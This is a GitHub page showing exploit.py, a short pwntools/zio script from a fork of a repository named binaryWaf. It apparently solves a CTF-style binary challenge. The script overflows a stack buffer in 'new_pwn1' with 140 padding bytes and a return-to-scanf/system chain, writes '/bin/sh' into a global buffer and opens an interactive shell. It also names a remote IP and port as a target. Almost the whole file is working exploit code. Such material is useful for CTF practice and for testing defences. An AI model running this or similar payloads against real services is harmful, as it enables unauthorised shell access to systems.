forked from Bluekezhou/binaryWaf
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
33 lines (28 loc) · 694 Bytes
/
exploit.py
File metadata and controls
33 lines (28 loc) · 694 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
from zio import *
debug = True
#create connection
if debug:
target = './new_pwn1'
else:
target = ('114.55.7.125', 8000)
r_m = COLORED(RAW, "green")
w_m = COLORED(RAW, "blue")
io = zio(target,timeout=9999,print_read=r_m,print_write=w_m)
'''
if debug:
gdb.attach(pidof('pwn1')[-1], open('aa'))
'''
#trigger bof
pattren_addr = 0x804888f
scanf_addr = 0x80484f0
system_addr = 0x80484b6
global_addr = 0x804a1a0
shellcode = 'A'*140 + p32(scanf_addr) + p32(system_addr) + p32(pattren_addr) + p32(global_addr)
shellcode = shellcode.ljust(256, 'B')
io.read_until('input your name:')
io.write(shellcode)
io.read_until(':')
io.writeline('1')
io.writeline('/bin/sh')
io.interact()